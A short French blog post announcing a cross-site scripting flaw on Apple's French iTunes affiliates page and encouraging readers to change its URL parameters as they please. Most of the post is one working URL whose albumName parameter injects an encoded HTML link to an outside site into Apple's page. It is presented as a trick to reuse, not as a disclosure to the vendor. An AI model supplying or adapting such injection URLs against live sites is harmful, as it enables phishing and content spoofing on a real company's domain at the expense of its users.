Faille XSS chez Apple
Hello les pommes, Une petite faille XSS est apparu sur la page affiliates d’Apple ce soir Le principe de cette faille XSS est d’injecter des données arbitraires dans les paramètres d’URL.
L’astuce: Modifier les paramètres en rouge a votre guise
http://www.apple.com/fr/itunes/affiliates/download/?artistName=Antoon&thumbnailUrl=http://a1.twimg.com/profile_images/339179906/Logo_bigger.jpg&itmsUrl=http://twitter.com/antoon619&albumName=%3Ca%20href=%22http://www.antoon.fr%22%3ENouvelle%20Star%3C/a%3E
